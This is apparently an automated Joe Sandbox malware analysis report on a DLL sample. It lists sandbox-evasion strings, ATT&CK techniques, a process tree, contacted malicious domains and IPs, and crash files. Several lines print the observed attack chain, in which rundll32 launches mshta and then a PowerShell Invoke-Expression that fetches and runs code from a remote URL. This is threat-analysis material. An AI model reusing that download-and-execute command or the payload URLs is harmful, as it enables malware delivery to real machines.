Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A84F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.8.drBinary or memory string: vmci.sys
Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: VMware20,1
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: rundll32.exe, 0000000C.00000002.2040536110.000002AC3C820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\$S 8
Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 194.124.213.167 443Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping21
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445895 Sample: UPazTgVGA7.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 76 45 siguefutbol.com 2->45 47 iapartmentlistings.com 2->47 49 www.siguefutbol.com 2->49 53 Antivirus detection for URL or domain 2->53 55 Machine Learning detection for sample 2->55 57 Sigma detected: Suspicious MSHTA Child Process 2->57 59 3 other signatures 2->59 10 loaddll64.exe 1 2->10         started        signatures3 process4 process5 12 rundll32.exe 3 15 10->12         started        16 rundll32.exe 13 10->16         started        18 cmd.exe 1 10->18         started        20 3 other processes 10->20 dnsIp6 51 siguefutbol.com 194.124.213.167, 443, 49706 SOLNETCH unknown 12->51 61 System process connects to network (likely due to code injection or exploit) 12->61 22 mshta.exe 1 12->22         started        24 mshta.exe 16->24         started        26 rundll32.exe 18->26         started        28 WerFault.exe 20 16 20->28         started        30 WerFault.exe 16 20->30         started        signatures7 process8 process9 32 powershell.exe 15 16 22->32         started        35 powershell.exe 24->35         started        37 WerFault.exe 16 26->37         started        dnsIp10 43 iapartmentlistings.com 91.222.173.38, 49713, 49716, 49733 KICUA-ASGI Ukraine 32->43 39 conhost.exe 32->39         started        41 conhost.exe 35->41         started        process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
UPazTgVGA7.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg100%Avira URL Cloudmalware
http://iapartmentlistings.com/tykhwuxk100%Avira URL Cloudmalware
https://www.siguefutbol.com/f=0%Avira URL Cloudsafe
https://www.siguefutbol.com/0%Avira URL Cloudsafe
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt100%Avira URL Cloudmalware
https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
iapartmentlistings.com
91.222.173.38
truetrue
    		unknown
    siguefutbol.com
    		194.124.213.167
    		truetrue
      		unknown
      www.siguefutbol.com
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://iapartmentlistings.com/tykhwuxkfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txttrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtgrundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://upx.sf.netAmcache.hve.8.drfalse
        • URL Reputation: safe
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtfrundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEMrundll32.exe, 00000012.00000002.2067605540.000001B9DE938000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.siguefutbol.com/f=rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txthrundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836rundll32.exe, 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2207076977.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2180195670.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, UPazTgVGA7.dllfalse
        • Avira URL Cloud: malware
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        194.124.213.167
        		siguefutbol.comunknown
        		9044SOLNETCHtrue
        91.222.173.38
        		iapartmentlistings.comUkraine
        		39249KICUA-ASGItrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1445895
        Start date and time:2024-05-22 18:06:05 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 41s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:27
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:UPazTgVGA7.dll
        (renamed file extension from exe to dll, renamed because original name is a hash value)
        Original Sample Name:e3493cc788d91b70277729ea748cce0d.exe
        Detection:MAL
        Classification:mal76.evad.winDLL@27/21@2/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 3

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.42.73.29
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target rundll32.exe, PID 3504 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: UPazTgVGA7.dll

        Simulations

        Behavior and APIs

        TimeTypeDescription
        12:06:57API Interceptor2x Sleep call for process: mshta.exe modified
        12:06:58API Interceptor1x Sleep call for process: loaddll64.exe modified
        12:06:58API Interceptor5916x Sleep call for process: powershell.exe modified
        12:07:11API Interceptor3x Sleep call for process: WerFault.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        91.222.173.38d.htaGet hashmaliciousUnknownBrowse
        • iapartmentlistings.com/tykhwuxk

        Domains

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        iapartmentlistings.comd.htaGet hashmaliciousUnknownBrowse
        • 91.222.173.38

        ASNs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        SOLNETCH8DR4MV2b0i.elfGet hashmaliciousMiraiBrowse
        • 212.101.2.142
        vniiXJivdo.elfGet hashmaliciousMiraiBrowse
        • 212.41.74.143
        cqf3hb5Qxg.elfGet hashmaliciousMiraiBrowse
        • 212.41.74.181
        2cO52KdAG9.elfGet hashmaliciousMiraiBrowse
        • 212.41.74.154
        Ctnox9WBxZ.elfGet hashmaliciousUnknownBrowse
        • 212.41.74.185
        XXsOGfMoub.elfGet hashmaliciousMirai, GafgytBrowse
        • 82.220.184.229
        mUP7fvcqLi.elfGet hashmaliciousMiraiBrowse
        • 212.41.74.182
        uA97EyP1li.elfGet hashmaliciousMiraiBrowse
        • 82.220.236.164
        LIL2hLY8io.elfGet hashmaliciousMiraiBrowse
        • 212.41.74.189
        62CajT4n8H.elfGet hashmaliciousUnknownBrowse
        • 82.220.65.40
        KICUA-ASGId.htaGet hashmaliciousUnknownBrowse
        • 91.222.173.38
        umkglnks.ps1Get hashmaliciousDarkGate, MailPassViewBrowse
        • 91.222.173.186
        1.htaGet hashmaliciousDarkGate, MailPassViewBrowse
        • 91.222.173.186

        JA3 Fingerprints

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        37f463bf4616ecd445d4a1937da06e19FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 194.124.213.167
        Factura_pdf.exeGet hashmaliciousGuLoaderBrowse
        • 194.124.213.167
        file.exeGet hashmaliciousVidarBrowse
        • 194.124.213.167
        Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
        • 194.124.213.167
        waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 194.124.213.167
        101764ZAM2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
        • 194.124.213.167
        Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
        • 194.124.213.167
        SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
        • 194.124.213.167
        New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
        • 194.124.213.167
        file.exeGet hashmaliciousVidarBrowse
        • 194.124.213.167

        Dropped Files

        No context

        Created / dropped Files

        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_2f674f4a-1c41-4588-8605-c89ae3137839\Report.wer

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.8062069614466518
        Encrypted:false
        SSDEEP:96:XgFU0eziiyKy8dsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqU:wFSiiyMFk0ZLKdjDuzuiFsZ24lO84
        MD5:2931A063291E1DCC35A3FF85E0415EBA
        SHA1:663459B1671B06C30CC49A11F943C3A5365EA24F
        SHA-256:FE8D49F3092898D25C087AB8E05C7A7FCC39EC20FD4674B707E136D6A2FF0E40
        SHA-512:5D010B1B97EC222EB7581C82CAA997BD2FB0B1DD793D4424123A2C37864E7B020AE18E458D66C9EA19D43BA51D58C714128CBD2F3D46C4373E7E70BC668AEC44
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.1.5.1.7.1.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.5.8.9.2.1.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.6.7.4.f.4.a.-.1.c.4.1.-.4.5.8.8.-.8.6.0.5.-.c.8.9.a.e.3.1.3.7.8.3.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.c.4.f.0.e.f.-.a.6.c.3.-.4.4.0.e.-.b.5.9.7.-.c.f.9.5.a.2.4.0.e.d.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.6.c.-.0.0.0.1.-.0.0.1.4.-.3.2.1.f.-.7.8.0.f.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.

        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_8aa9a7b9-25be-4214-91fe-7d01e7ec8999\Report.wer

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.8032715490544936
        Encrypted:false
        SSDEEP:96:vGFpwFkziwyKyUsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqH:OxiwyUFk0ZLKdjDuzuiFsZ24lO84
        MD5:D573C3829AEFBABF48F5BFB3B8237317
        SHA1:B4C45A6A211DBE8ED504732652D6132B18F241AA
        SHA-256:4588FFE464B220EF7DA3D98C315966760705DC21FC7A99FB454DD38EC3508C33
        SHA-512:3774B13139B77D2BE0B233FD9B7DFFC987033A703FE31579F53086088AB79CE204CCC55D6F906F93BEB5F274E2B638EDFA4D457E59A686BAA462DF14563D879C
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.9.5.0.4.7.7.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.2.0.0.9.8.5.3.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.a.9.a.7.b.9.-.2.5.b.e.-.4.2.1.4.-.9.1.f.e.-.7.d.0.1.e.7.e.c.8.9.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.b.a.6.b.5.9.-.0.1.d.9.-.4.9.7.4.-.a.e.f.3.-.6.8.c.f.a.9.8.2.5.d.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.d.0.-.0.0.0.1.-.0.0.1.4.-.a.7.f.4.-.1.0.1.3.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.

